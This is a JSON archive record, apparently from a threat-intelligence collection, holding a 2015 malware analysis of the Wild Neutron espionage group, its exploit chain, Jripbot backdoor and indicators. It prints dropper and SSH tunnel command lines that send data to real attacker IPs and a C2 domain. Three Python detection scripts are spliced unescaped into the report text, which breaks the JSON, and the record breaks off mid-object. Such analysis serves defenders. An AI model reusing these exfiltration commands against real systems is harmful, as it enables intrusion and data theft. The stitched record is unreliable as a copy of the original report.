{
	"id": "e50de9a0-2763-43d4-9e44-1a80b3759f98",
	"created_at": "2026-04-06T02:12:46.02544Z",
	"updated_at": "2026-04-10T03:35:53.683141Z",
	"deleted_at": null,
	"sha1_hash": "04782375b790b045df57c2ae4e91d69911a58dfa",
	"title": "Wild Neutron – Economic espionage threat actor returns with new tricks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 675150,
	"plain_text": "Wild Neutron – Economic espionage threat actor returns with new tricks\r\nBy GReAT\r\nPublished: 2015-07-08 · Archived: 2026-04-06 01:38:57 UTC\r\nA powerful threat actor known as “Wild Neutron” (also known as “Jripbot” and “Morpho”) has been active since\r\nat least 2011, infecting high-profile companies for several years by using a combination of exploits, watering holes\r\nand multi-platform malware.\r\nThe latest round of attacks in 2015 uses a stolen code signing certificate belonging to Taiwanese electronics maker\r\nAcer and an unknown Flash Player exploit.\r\nWild Neutron hit the spotlight in 2013, when it successfully infected companies such as Apple, Facebook, Twitter\r\nand Microsoft. This attack took advantage of a Java zero-day exploit and used hacked forums as watering holes.\r\nThe 2013 incident was highly publicized and, in the aftermath, the threat actor went dark for almost one year.\r\nIn late 2013 and early 2014 the attacks resumed and continued throughout 2015. Targets of the new attacks\r\ninclude:\r\nLaw firms\r\nBitcoin-related companies\r\nInvestment companies\r\nLarge company groups often involved in M\u0026A deals\r\nIT companies\r\nHealthcare companies\r\nReal estate companies\r\nIndividual users\r\nThe focus of these attacks suggests this is not a nation-state sponsored actor. 
However, the use of zero-days and multi-platform malware, as well as other techniques, makes us believe it’s a powerful entity engaged in espionage,\r\npossibly for economic reasons.\r\nOlder (2013) campaigns\r\nDuring the 2013 attacks, the Wild Neutron actor successfully compromised and leveraged the website\r\nwww.iphonedevsdk[.]com, which is an iPhone developers forum.\r\nhttps://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/\r\nPage 1 of 14\n\nThe attackers injected a script into the forum that redirected visitors to another website (min.liveanalytics[.]org –\r\ncurrently SINKHOLED by Kaspersky Lab) that hosted a Java zero-day exploit. A similar attack was also found in\r\nanother forum dedicated to Linux developers: fedoraforum[.]org. For a more detailed analysis of these 2013\r\nattacks, see Eric Romang’s blog: http://eromang.zataz.com/2013/02/20/facebook-apple-twitter-watering-hole-attack-additional-informations/.\r\nOther forums compromised by the Wild Neutron group and identified by reports from the Kaspersky Security\r\nNetwork include:\r\nexpatforum.com\r\nmygsmindia.com\r\nforum.samdroid.net\r\nemiratesmac.com\r\nforums.kyngdvb.com\r\ncommunity.flexispy.com\r\nansar1.info\r\nIn particular, two of these stand out: “community.flexispy[.]com” and “ansar1[.]info”. The first one is a\r\ncommunity run by Flexispy, a company that sells spyware for mobile devices. The second one is a Jihadist forum\r\nthat is currently closed.\r\nansar1[.]info was injected by Wild Neutron in 2013\r\nBack in 2013, the attackers also leveraged a Mac OS X backdoor, known as OSX/Pintsized. This is also described\r\nin more detail in Eric Romang’s excellent blog: http://eromang.zataz.com/2013/03/24/osx-pintsized-backdoor-additional-details/. 
The same backdoor, compiled for Win32, is still being used in the 2015 attacks.\r\nSome of the more prominent victims of the 2013 attack include Twitter, Facebook, Apple and Microsoft. These\r\nbreaches were covered widely by the press, and some of the affected companies issued statements on the incident (see\r\nFacebook’s statement).\r\nThe targeting of major IT companies like Facebook, Twitter, Apple and Microsoft is unusual; however, it is not\r\nentirely unique. The lack of victims in other sectors, such as diplomatic or government institutions, is however\r\nquite unusual. This makes us believe this is not a nation-state sponsored attack.\r\nTechnical analysis\r\nThe malware set used by the Wild Neutron threat actor has several component groups, including:\r\nA main backdoor module that initiates the first communication with the C\u0026C server\r\nSeveral information gathering modules\r\nExploitation tools\r\nSSH-based exfiltration tools\r\nIntermediate loaders and droppers that decrypt and run the payloads\r\nAlthough customized, some of the modules seem to be heavily based on open source tools (e.g. the password\r\ndumper resembles the code of Mimikatz and the Pass-The-Hash Toolkit) and commercial malware (the HTTPS proxy\r\nmodule is practically identical to the one used by Hesperbot).\r\nAll C\u0026C communication is encrypted with a custom protocol. Dropped executables, as well as some of the\r\nhardcoded strings, are usually obfuscated with XOR (the key depends on the bot version). 
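The XOR obfuscation just described, and the key 0x66 that the dropper section below gives for the embedded backdoor resource, can be undone without knowing the key in advance, because a PE image has fixed plaintext at known positions. The script below is an added example, not code from the report or from Kaspersky. The dropper it runs on is a constructed stand-in (junk bytes followed by a minimal PE image XORed with 0x66), and the function names are the example's own. It derives the candidate key from the position where "MZ" must sit, confirms it with the e_lfanew pointer and the "PE\0\0" signature, then lists the strings that become readable, which is where the C2 URL and the /opts parameters of a real dropper would show up.

```python
import struct

MZ = b"MZ"
PE_SIG = b"PE\x00\x00"


def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR; it is its own inverse, so it both hides and recovers."""
    return bytes(b ^ key for b in data)


def find_xored_pe(blob: bytes):
    """Locate a PE image hidden under an unknown single-byte XOR key.

    Returns (key, offset) or None. For each position the key that would turn
    that byte into 'M' is derived, then confirmed by 'Z', a plausible e_lfanew
    and the 'PE\\0\\0' signature it points to. No 256-key brute force is
    needed, and random data cannot pass all three checks at once.
    """
    for i in range(len(blob) - 0x40):
        key = blob[i] ^ MZ[0]
        if blob[i + 1] ^ key != MZ[1]:
            continue
        e_lfanew = struct.unpack("<I", xor_bytes(blob[i + 0x3C:i + 0x40], key))[0]
        if not 0x40 <= e_lfanew <= 0x400 or i + e_lfanew + 4 > len(blob):
            continue
        if xor_bytes(blob[i + e_lfanew:i + e_lfanew + 4], key) == PE_SIG:
            return key, i
    return None


def carve_payload(blob: bytes):
    """Return (key, decoded PE bytes from the MZ header onward) or None."""
    hit = find_xored_pe(blob)
    if hit is None:
        return None
    key, off = hit
    return key, xor_bytes(blob[off:], key)


def printable_strings(data: bytes, min_len: int = 8):
    """ASCII runs of at least min_len characters, as strings(1) would list them."""
    out, run = [], bytearray()
    for b in data:
        if 0x20 <= b < 0x7F:
            run.append(b)
            continue
        if len(run) >= min_len:
            out.append(run.decode())
        run = bytearray()
    if len(run) >= min_len:
        out.append(run.decode())
    return out


def build_sample_dropper(key: int = 0x66) -> bytes:
    """Constructed stand-in for a dropper: junk, then a minimal PE image XORed
    with key. Not a real Wild Neutron sample; the config string mirrors the
    parameter format the report quotes."""
    stub = b"This program cannot be run in DOS mode.\r\n$"
    dos = bytearray(0x80)
    dos[0:2] = MZ
    dos[0x3C:0x40] = struct.pack("<I", 0x80)      # e_lfanew: NT headers at 0x80
    dos[0x4E:0x4E + len(stub)] = stub
    nt = PE_SIG + b"\x4c\x01" + b"\x00" * 18       # IMAGE_FILE_MACHINE_I386, rest zeroed
    config = b"https://app.cloudprotect.eu:443 /opts resolv=logs.cloudprotect.eu\x00"
    payload = bytes(dos) + nt + config
    junk = bytes(range(64)) + b"RSRC"
    return junk + xor_bytes(payload, key)


if __name__ == "__main__":
    key, pe = carve_payload(build_sample_dropper())
    print(f"key=0x{key:02x} payload={len(pe)} bytes")
    for s in printable_strings(pe):
        print("  ", s)
```

The same trick generalizes to any file type with a fixed magic: substitute the expected header bytes for "MZ" and a second structural check for the e_lfanew/"PE" pair. Multi-byte or rolling XOR keys defeat it, which is why the report's note that the key varies by bot version matters when triaging a new sample.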
The main backdoor module contains\r\na number of evasion techniques, designed to detect or time out sandboxes and emulation engines.\r\nExploitation – 2015\r\nThe initial infection vector from the 2014-2015 attacks is still unknown, although there are clear indications that\r\nthe victims are exploited by a kit that leverages an unknown Flash Player exploit.\r\nThe following exploitation chain was observed in one of the attacks:\r\nSite hxxp://cryptomag.mediasource.ch/\r\nPaths\r\n/favicon.ico\r\n/msie9html5.jpg\r\n/loader-large.gif\r\n/bootstrap.min.css\r\n/stats.js?d=1434374526478\r\n/autoload.js?styleid=20\u0026langid=5\u0026sid=883f2efa\u0026d=1434374526\r\n/banner.html?styleid=19\u0026langid=23\u0026sid=883f2efa\u0026d=1434374526\r\n/883f2efa/bniqligx.swf?styleid=4\u0026langid=6\u0026sid=883f2efa\u0026d=1434374533\r\n/883f2efa/pzixfgne?styleid=5\u0026langid=25\u0026sid=883f2efa\u0026d=1434374533\r\n/883f2efa/bniqligx.swf?styleid=4\u0026langid=6\u0026sid=883f2efa\u0026d=1434374533/\r\n/background.jpg\r\nThe subdomain cryptomag.mediasource[.]ch appears to have been created for this attack; it pointed to an IP\r\naddress associated with other Wild Neutron C\u0026Cs, highlighted in red below:\r\nHosts resolving to 66.55.133[.]89\r\nWhile app.cloudprotect[.]eu and ssl.cloudprotect[.]eu are two known Wild Neutron C\u0026Cs,\r\ncryptomag.mediasource[.]ch appears to have been pointed to this IP for the purpose of exploitation. Another\r\nsuspicious domain can be observed above, secure.pdf-info[.]com. 
We haven’t seen any attacks connected with this\r\nhostname yet; however, the naming scheme indicates this is also malicious.\r\nIn another attack, we observed a similar exploitation chain, hosted on a different website, hxxp://find.a-job.today/.\r\nIn both cases, the visitors browsed the website, or arrived via what appears to have been an online advertisement.\r\nFrom there, “autoload.js” appears in both cases, which redirects to another randomly named HTML file, which\r\neventually loads a randomly named SWF file.\r\nWhile the group used watering hole attacks in 2013, it’s still unclear how victims get redirected to the exploitation\r\nkits in the new 2014-2015 attacks. Instead of Flash exploits, older Wild Neutron exploitation and watering holes\r\nused what was a Java zero-day at the end of 2012 and the beginning of 2013, detected by Kaspersky Lab products\r\nas Exploit.Java.CVE-2012-3213.b.\r\nThe main malware dropper\r\nThe functionality of the main dropper is relatively simple: it decrypts the backdoor executable (stored as a\r\nresource and obfuscated with a single-byte XOR, key 0x66), writes it to a specified path and then executes it with\r\nparameters that are hardcoded in the dropper body. One of the parameters is the URL address of the C\u0026C server,\r\nwhile the others contain various bot configuration options.\r\nExample parameters used by the dropper:\r\nigfxupt.exe https://app.cloudprotect[.]eu:443 /opts resolv=logs.cloudprotect[.]eu\r\nAfter executing the main backdoor, the dropper is securely deleted by overwriting its content with random\r\nnumbers several times before renaming and removing the file.\r\nThe main backdoor (aka “Jripbot”)\r\nThis binary is executed with the URL address of the C\u0026C server as a parameter; it can also receive an optional bot\r\nconfiguration. 
This information is then double-encrypted – first with RC4 and then with the Windows\r\nCryptProtectData function – and saved to the registry.\r\nBefore performing any other activity, the malware first runs its stalling code (designed to exhaust the time budget of emulators),\r\nthen performs several anti-sandboxing checks and enters an infinite loop if any unwanted software running in the\r\nsystem is detected.\r\nOtherwise, it gathers some basic system information:\r\nVersion of the operating system\r\nWhether the program is running under WOW64\r\nWhether the current user has administrator privileges\r\nWhich security features of Windows are enabled\r\nUsername and computer name\r\nServer name and LAN group\r\nInformation about logical drives\r\nSystem uptime and idle time\r\nDefault web browser\r\nProxy settings\r\nBased on some of this information, the malware generates a unique ID for the victim and starts the C\u0026C\r\ncommunication by sending the ID value and awaiting commands.\r\nBackdoor configuration options may include the proxy server address and credentials, sleeptime/delay values and\r\nthe connection type, but the most interesting option is the resolv=[url] option. If this option is set, the malware\r\ngenerates a domain name consisting of the computer name, the unique ID and the URL passed with this option; then\r\nit tries to resolve the IP address of this domain. 
We suspect this is the method the attackers use to send the\r\ngenerated UID to the C\u0026C.\r\nCommands from the C\u0026C may instruct the bot to perform the following actions:\r\nChange the current directory to the requested one\r\nExecute an arbitrary command in the command line\r\nSet the autorun value for itself in the registry\r\nDelete the autorun value for itself in the registry\r\nShred a requested file (overwrite the file content with random numbers, overwrite the file name with zeroes\r\nand then delete it)\r\nDownload a file from the Internet and save it (optionally encrypted) to disk\r\nInstall or uninstall additional malware plugins\r\nCollect and send system information\r\nEnumerate drives\r\nSet the sleeptime value\r\nUpdate the configuration\r\nUpdate itself\r\nQuit\r\nOlder versions of this backdoor, used in the 2013 attacks, had a bit more functionality:\r\nPassword harvesting\r\nPort scanning\r\nCollecting screenshots\r\nPushing files to the C\u0026C\r\nReverse shell\r\nThese features were removed from the newer backdoor versions that are used in recent attacks. Instead, the malware\r\ndevelopers decided to implement a plugin mechanism and run different tools for different tasks. This suggests a\r\nclear shift towards a more flexible, modular architecture.\r\nIn terms of functionality, the main backdoor is no different from many other Remote Access Tools (RATs). What\r\nreally stands out is the care the attackers take to hide the C\u0026C address, by encrypting it in the registry with\r\nmachine-dependent information. 
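The resolv option described above turns DNS into a side channel: the generated name carries the victim's computer name and unique ID, and the query reaches whoever is authoritative for the resolv domain even when the HTTPS C2 is down. The script below is an added example, not part of the report, of how that behaviour can be hunted in DNS query logs. The log line format, the sample queries and the exact shape of the generated name (assumed here to be computer name, then ID, then the resolv domain, an order the report does not specify) are constructed for the example; the indicator list is the report's own, and the function names are the example's.

```python
import math
import re
from collections import defaultdict

# Hostnames from the report's IOC list. A query matches an indicator if it
# equals it or sits beneath it, so names the backdoor generates under
# logs.cloudprotect.eu are caught without knowing their exact form.
WILD_NEUTRON_HOSTS = {
    "ddosprotected.eu", "updatesoft.eu", "app.cloudprotect.eu",
    "fw.ddosprotected.eu", "logs.cloudprotect.eu", "ssl.cloudprotect.eu",
    "ssl.updatesoft.eu", "adb.strangled.net", "digitalinsight-ltd.com",
    "ads.digitalinsight-ltd.com", "cache.cloudbox-storage.com",
    "cloudbox-storage.com", "clust12-akmai.net", "corp-aapl.com",
    "fb.clust12-akmai.net", "fbcbn.net", "img.digitalinsight-ltd.com",
    "jdk-update.com", "liveanalytics.org", "min.liveanalytics.org",
    "pop.digitalinsight-ltd.com", "ww1.jdk-update.com", "find.a-job.today",
    "cryptomag.mediasource.ch",
}

# Assumed log format (not from the report): "<timestamp> <client ip> <qname> <qtype>"
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<qname>\S+)\s+(?P<qtype>\S+)$")
HEX_LABEL = re.compile(r"^[0-9a-f]{8,}$")


def ioc_match(qname: str):
    """Longest indicator that qname equals or is a subdomain of, or None."""
    hits = [h for h in WILD_NEUTRON_HOSTS if qname == h or qname.endswith("." + h)]
    return max(hits, key=len) if hits else None


def shannon_entropy(s: str) -> float:
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def looks_like_id(label: str) -> bool:
    """A label that reads like an identifier rather than a word: long hex, or long and high-entropy."""
    return bool(HEX_LABEL.match(label)) or (len(label) >= 10 and shannon_entropy(label) > 3.3)


def parent_domain(qname: str, labels: int = 2) -> str:
    # Two trailing labels is a simplification; a public-suffix list would do better.
    return ".".join(qname.split(".")[-labels:])


def triage_dns(lines, min_distinct: int = 3):
    """Return findings from DNS query log lines.

    Known infrastructure is matched directly. For unknown infrastructure the
    heuristic keys on the parent domain across all clients: the generated
    name is stable per victim (computer name + unique ID), so one host repeats
    one name and never looks noisy, but a fleet shows several distinct
    ID-like names under a single parent.
    """
    findings = []
    id_like = defaultdict(lambda: defaultdict(set))  # parent -> qname -> clients
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        client, qname = m["client"], m["qname"].lower().rstrip(".")
        hit = ioc_match(qname)
        if hit:
            kind = "ioc-hostname" if qname == hit else "resolv-beacon"
            findings.append({"client": client, "name": qname, "kind": kind, "detail": hit})
            continue
        labels = qname.split(".")
        if any(looks_like_id(lab) for lab in labels[:-2]):
            id_like[parent_domain(qname)][qname].add(client)
    for parent, names in id_like.items():
        if len(names) >= min_distinct:
            clients = set().union(*names.values())
            findings.append({"client": "*", "name": parent, "kind": "possible-dns-beacon",
                             "detail": f"{len(names)} id-like names from {len(clients)} clients"})
    return findings


# Constructed sample log (not a real capture). The first line assumes the
# generated name has the form <computer name>.<unique id>.<resolv domain>.
SAMPLE_DNS_LOG = """\
2015-06-15T09:12:01Z 10.0.3.21 ws-fin-07.3f9c2a1e7b.logs.cloudprotect.eu A
2015-06-15T09:12:05Z 10.0.3.21 app.cloudprotect.eu A
2015-06-15T09:13:10Z 10.0.3.44 www.example.com A
2015-06-15T09:13:11Z 10.0.3.44 a1b2c3d4e5f6.cdn.example.com A
2015-06-15T09:14:02Z 10.0.3.44 find.a-job.today A
2015-06-15T10:01:00Z 10.0.3.21 ws-fin-07.3f9c2a1e7b.t.example.org A
2015-06-15T10:01:30Z 10.0.3.22 ws-fin-08.77d0be19c4.t.example.org A
2015-06-15T10:02:12Z 10.0.3.23 ws-lgl-02.0c3a9f5e21.t.example.org A
"""

if __name__ == "__main__":
    for finding in triage_dns(SAMPLE_DNS_LOG.splitlines()):
        print(finding)
```

The single CDN-style name under example.com is deliberately left unflagged: one ID-like name from one client is how legitimate content-hash hostnames look, whereas several distinct ID-like names under one parent, each from a different host, is the fleet-wide shape of a per-victim beacon.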
Also notable is the ability to recover from a C\u0026C shutdown by contacting a\r\ndynamically generated domain name, which only the attackers know in advance, as it is directly tied to each\r\nunique victim.\r\nAccording to the compilation timestamps of the samples, the distribution is as follows:\r\nEach backdoor appears to contain an internal version number, which ranges from 11000 in the earliest samples to the 16000 series in the latest\r\nones. This allows us to trace the following evolutionary map:\r\nBackdoors used in the 2013 attacks:\r\nMD5 Timestamp Version Filename Size (bytes)\r\n1582d68144de2808b518934f0a02bfd6 29 Nov 2012 11000 javacpl.exe 327168\r\n14ba21a3a0081ef60e676fd4945a8bdc 30 Nov 2012 12000 javacpl.exe 329728\r\n0fa3657af06a8cc8ef14c445acd92c0f 09 Jan 2013 13000 javacpl.exe 343552\r\nBackdoors used in the 2014 and 2015 attacks:\r\nMD5 Timestamp Version Filename Size (bytes)\r\n95ffe4ab4b158602917dd2a999a8caf8 13 Dec 2013 14014 LiveUpdater.exe 302592\r\n342887a7ec6b9f709adcb81fef0d30a3 20 Jun 2014 15013 FlashUtil.exe 302592\r\ndee8297785b70f490cc00c0763e31b69 02 Aug 2013 (possibly fake) 16010 IgfxUpt.exe 291328\r\nf0fff29391e7c2e7b13eb4a806276a84 27 Oct 2014 16017 RtlUpd.exe 253952\r\nThe installers also have a version number, which indicates the following evolution:\r\nMD5 Timestamp Version\r\n1f5f5db7b15fe672e8db091d9a291df0 16 Dec 2011 1.4.1\r\n48319e9166cda8f605f9dce36f115bc8 28 Sep 2012 1.5.0\r\n088472f712d1491783bbad87bcc17c48 12 Apr 2013 1.6.3\r\nee24a7ad8d137e54b854095188de0bbf 07 Jan 2014 1.6.4\r\nLateral movement\r\nAfter installing the main backdoor and establishing initial C2 communication, the attackers use a range of\r\ndifferent tools to extract sensitive data and control the victim’s machine. 
These tools include a password\r\nharvesting trojan, a reverse-shell backdoor and customized implementations of OpenSSH, WMIC and SMB.\r\nSometimes, they only drop a simple Perl reverse shell and use various collection methods to retrieve credentials\r\nfrom a set of machines, escalate privileges, and fan out across a network from there. Besides these tools, there are\r\nalso a number of small utility modules with different functions, from loaders and configuration tools, to file\r\nshredders and network proxies.\r\nIt’s also worth noting that this threat actor relies heavily on existing code, using publicly available open\r\nsource applications, as well as Metasploit tools and leaked malware sources, to build its own toolset. Some of\r\nthese tools are designed to work under Cygwin and come together with the Cygwin API DLL, which may suggest\r\nthat the attackers feel more comfortable when working in a Unix-like environment.\r\nSSH tunnel backdoor\r\nDuring the 2014/2015 attacks, we observed the attackers deploying custom, OpenSSH-based Win32 tunnel\r\nbackdoors that are used to exfiltrate large amounts of data in a reliable manner. These tunnel backdoors are written\r\nas “updt.dat” and executed with two parameters, -z and -p. These specify the IP to connect to and the port. 
Despite\r\nthe use of port 443, the connection is SSH, not TLS:\r\n/d /u /c updt.dat -z 185.10.58.181 -p 443\r\n/d /u /c updt.dat -z 46.183.217.132 -p 443\r\n/d /u /c updt.dat -z 217.23.6.13 -p 443\r\nFor authentication, the SSH tunnel backdoor contains a hardcoded RSA private key.\r\nStolen certificate\r\nDuring the 2015 attacks, Wild Neutron used a dropper signed with a stolen but valid Acer Incorporated certificate.\r\nAcer signature on Wild Neutron dropper\r\nThe abused certificate has the following properties:\r\nSerial: 5c c5 3b a3 e8 31 a7 df dc 7c 28 d5 15 8f c3 80\r\nThumbprint (SHA-1): 0d 85 91 41 ee 9a 0c 6e 72 5f fe 6b cf c9 9f 3e fc c3 fc 07\r\nThe dropper (MD5 dbb0ea0436f70f2a178a60c4d8b791b3) appears to have been signed on June 15, 2015. It drops a\r\nJripbot backdoor as “IgfxUpt.exe” and configures it to use the C\u0026C “app.cloudprotect[.]eu”.\r\nWe have worked with Symantec, Verisign and Acer to revoke the compromised certificate.\r\nVictims and statistics\r\nThe Wild Neutron attacks appear to be highly targeted. During our investigation, we have been able to\r\nidentify several victims across 11 countries and territories:\r\nFrance\r\nRussia\r\nSwitzerland\r\nGermany\r\nAustria\r\nPalestine\r\nSlovenia\r\nKazakhstan\r\nUAE\r\nAlgeria\r\nUnited States\r\nThe victims of the 2014-2015 campaigns are generally IT and real estate/investment companies, and in both cases only a\r\nsmall number of computers were infected in each organization. 
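Returning to the SSH tunnel backdoor above: an SSH session on TCP 443 is a protocol mismatch that a sensor can recognise from the first bytes of the stream, and the updt.dat -z <ip> -p <port> invocation is a stable process-creation signature. The script below is an added example, not the report's code. The flows and command lines it inspects are constructed samples, the IP list is the report's IOC list, and the function names are the example's own.

```python
import re

# Exfiltration and C2 addresses from the report's IOC list.
WILD_NEUTRON_IPS = {
    "185.10.58.181", "46.183.217.132", "64.187.225.231",
    "62.113.238.104", "66.55.133.89", "217.23.6.13",
}
TLS_PORTS = {443, 8443}

# SSH identification string (RFC 4253 section 4.2); each side sends one first.
SSH_ID = re.compile(rb"^SSH-(?:2\.0|1\.99)-")
# Command line the report quotes for the tunnel backdoor: updt.dat -z <ip> -p <port>
TUNNEL_CMD = re.compile(r"updt\.dat\s+-z\s+(\d{1,3}(?:\.\d{1,3}){3})\s+-p\s+(\d{1,5})")


def classify_stream_start(first_bytes: bytes) -> str:
    """'ssh', 'tls' or 'other' from the first bytes a peer sends.

    TLS opens with a handshake record: content type 0x16, version 0x03 0x0X,
    a 2-byte length, then handshake type 0x01 (ClientHello) or 0x02
    (ServerHello). SSH opens with its plaintext identification string, so the
    two are distinguishable from byte 0 without decrypting anything.
    """
    if SSH_ID.match(first_bytes):
        return "ssh"
    if (len(first_bytes) >= 6 and first_bytes[0] == 0x16
            and first_bytes[1] == 0x03 and first_bytes[2] <= 0x04
            and first_bytes[5] in (0x01, 0x02)):
        return "tls"
    return "other"


def hunt_flows(flows):
    """Flag SSH on TLS ports and any traffic to the report's IPs.

    Each flow is a dict with src, dst, dport and the first bytes sent by
    either peer (from a full-packet capture or a sensor's payload preview).
    """
    findings = []
    for f in flows:
        proto = classify_stream_start(f["first_bytes"])
        if proto == "ssh" and f["dport"] in TLS_PORTS:
            findings.append((f["src"], f["dst"], f["dport"], "ssh-on-tls-port"))
        if f["dst"] in WILD_NEUTRON_IPS:
            findings.append((f["src"], f["dst"], f["dport"], "known-wild-neutron-ip"))
    return findings


def hunt_cmdlines(cmdlines):
    """Return (ip, port) for every process command line that matches the tunnel backdoor invocation."""
    hits = []
    for line in cmdlines:
        m = TUNNEL_CMD.search(line)
        if m:
            hits.append((m.group(1), int(m.group(2))))
    return hits


# Constructed sample data, not real captures.
SAMPLE_FLOWS = [
    {"src": "10.0.3.21", "dst": "185.10.58.181", "dport": 443,
     "first_bytes": b"SSH-2.0-OpenSSH_6.2\r\n"},
    {"src": "10.0.3.44", "dst": "93.184.216.34", "dport": 443,
     "first_bytes": b"\x16\x03\x01\x00\xc8\x01\x00\x00\xc4\x03\x03"},
    {"src": "10.0.3.50", "dst": "10.0.0.5", "dport": 22,
     "first_bytes": b"SSH-2.0-OpenSSH_6.6\r\n"},
    {"src": "10.0.3.21", "dst": "217.23.6.13", "dport": 443,
     "first_bytes": b"\x16\x03\x01\x00\xc8\x01\x00\x00\xc4\x03\x03"},
]
SAMPLE_CMDLINES = [
    r"C:\Windows\System32\cmd.exe /d /u /c updt.dat -z 185.10.58.181 -p 443",
    r"C:\Windows\System32\svchost.exe -k netsvcs",
]

if __name__ == "__main__":
    for hit in hunt_flows(SAMPLE_FLOWS):
        print("flow:", hit)
    for hit in hunt_cmdlines(SAMPLE_CMDLINES):
        print("cmdline:", hit)
```

The protocol check is the durable part: the IPs in the report were sinkholed or rotated long ago, but a tunnel that speaks SSH on a port reserved for HTTPS looks the same regardless of where it connects, and a TLS-terminating proxy that expects a ClientHello on 443 will reject it outright, which is one reason to force outbound 443 through such a proxy.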
The attackers appear to have updated\r\nthe malware implant and deployed some additional tools; however, we have not observed significant lateral movement\r\nin these cases.\r\nAttribution\r\nThe targeting of various companies, without a government focus, makes us believe this is not a nation-state\r\nsponsored APT. The attackers have also shown an interest in investment-related targets, which indicates the knowledge\r\nand skills needed to trade on such information for financial gain.\r\nIn some of the samples, the encrypted configuration includes a Romanian language string, which is used to mark\r\nthe end of the C\u0026C communication: “La revedere”.\r\nInterestingly, “La revedere” means “goodbye” in Romanian. In addition to that, we found another non-English\r\nstring which is the Latin transliteration of the Russian word Успешно (“uspeshno” -\u003e “successfully”); this string is\r\nwritten to a pipe after executing a C2 command.\r\nOne of the samples has an internal name of “WinRAT-Win32-Release.exe”. This seems to indicate the authors are\r\ncalling the malware “WinRAT”.\r\nMore information about the Wild Neutron attribution is available to Kaspersky Intelligence Services\r\ncustomers. Contact: intelreports@kaspersky.com\r\nConclusions\r\nCompared to other APT groups, Wild Neutron is one of the most unusual ones we’ve analysed and tracked. Active\r\nsince 2011, the group has been using at least one zero-day exploit, custom malware and tools, and has managed to keep\r\na relatively solid opsec which has so far eluded most attribution efforts. 
Their targeting of major IT companies,\r\nspyware developers (FlexiSPY), jihadist forums (the “Ansar Al-Mujahideen English Forum”) and Bitcoin\r\ncompanies indicates a flexible yet unusual mindset and interests.\r\nSome of the group’s distinctive features include:\r\nUse of open source tools and leaked sources of other malware\r\nUse of a stolen certificate from Acer Incorporated to sign malware\r\nUse of cross-platform zero-day exploits (Java and Flash) followed by a cross-platform reverse-shell payload\r\n(Perl) for initial penetration\r\nUse of *NIX code ported to Windows through Cygwin\r\nHeavy use of SSH, a common *NIX administration tool, for exfiltration\r\nUse of the CryptProtectData API to keep C\u0026C URLs secret\r\nA simple command-line interface shared by all malware components, using named pipes for\r\ncommunication between modules\r\nAuxiliary tools are written in C and most of them contain a built-in help text, which may be printed by\r\nexecuting the binary with a “–pleh” parameter\r\nWe continue to track the Wild Neutron group, which is still active as of June 2015.\r\nKaspersky products detect the malware used in the attacks as:\r\nHEUR:Trojan.Win32.WildNeutron.gen, Trojan.Win32.WildNeutron.*, Trojan.Win32.JripBot.*,\r\nHEUR:Trojan.Win32.Generic\r\nRead more about how Kaspersky Lab products can help to protect you from the Wild Neutron threat actor here:\r\nWild Neutron in the wild: perhaps you’re his next prey\r\nIndicators of Compromise (IOCs)\r\nKnown malicious hostnames and 
domains:\r\nddosprotected.eu\r\nupdatesoft.eu\r\napp.cloudprotect.eu\r\nfw.ddosprotected.eu\r\nlogs.cloudprotect.eu\r\nssl.cloudprotect.eu\r\nssl.updatesoft.eu\r\nadb.strangled.net\r\ndigitalinsight-ltd.com\r\nads.digitalinsight-ltd.com\r\ncache.cloudbox-storage.com\r\ncloudbox-storage.com\r\nclust12-akmai.net\r\ncorp-aapl.com\r\nfb.clust12-akmai.net\r\nfbcbn.net\r\nimg.digitalinsight-ltd.com\r\njdk-update.com\r\nliveanalytics.org\r\nmin.liveanalytics.org\r\npop.digitalinsight-ltd.com\r\nww1.jdk-update.com\r\nfind.a-job.today\r\ncryptomag.mediasource.ch\r\nKnown malicious IPs:\r\n185.10.58.181\r\n46.183.217.132\r\n64.187.225.231\r\n62.113.238.104\r\n66.55.133.89\r\n217.23.6.13\r\nKnown file names:\r\n%APPDATA%\\Roaming\\FlashUtil.exe\r\n%APPDATA%\\Roaming\\Acer\\LiveUpdater.exe\r\n%APPDATA%\\Roaming\\Realtek\\RtlUpd.exe\r\n%ProgramData%\\Realtek\\RtlUpd.exe\r\n%APPDATA%\\Roaming\\sqlite3.dll (UPX packed)\r\n%WINDIR%\\winsession.dll\r\n%APPDATA%\\appdata\\local\\temp\\teamviewer\\version9\\update.exe\r\n%SYSTEMROOT%\\temp\\_dbg.tmp\r\n%SYSTEMROOT%\\temp\\ok.tmp\r\nC:\\windows\\temp\\debug.txt\r\nC:\\windows\\syswow64\\mshtaex.exe\r\n%SYSROOT%\\System32\\mshtaex.exe\r\n%SYSROOT%\\System32\\wdigestEx.dll\r\n%SYSROOT%\\System32\\dpcore16t.dll\r\n%SYSROOT%\\System32\\iastor32.exe\r\n%SYSROOT%\\System32\\mspool.dll\r\n%SYSROOT%\\System32\\msvcse.exe\r\n%SYSROOT%\\System32\\mspool.exe\r\nC:\\Program Files (x86)\\LNVSuite\\LnrAuth.dll\r\nC:\\Program Files (x86)\\LNVSuite\\LnrAuthSvc.dll\r\nC:\\Program Files (x86)\\LNVSuite\\LnrUpdt.exe\r\nC:\\Program Files (x86)\\LNVSuite\\LnrUpdtP.exe\r\nDF39527~.tmp\r\nNamed pipes:\r\n\\\\.\\pipe\\winsession\r\n\\\\.\\pipe\\lsassw\r\nEvents \u0026 
mutexes:\r\nGlobal\\LnrRTPDispatchEvents\r\n_Winlogon_TCP_Service\r\nSource: https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
	],
	"report_names": [
		"wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks"
	],
	"threat_actors": [
		{
			"id": "92c0dae2-e255-4b90-8d8f-be88e393ab8d",
			"created_at": "2022-10-25T16:07:24.402328Z",
			"updated_at": "2026-04-10T02:00:04.97641Z",
			"deleted_at": null,
			"main_name": "Wild Neutron",
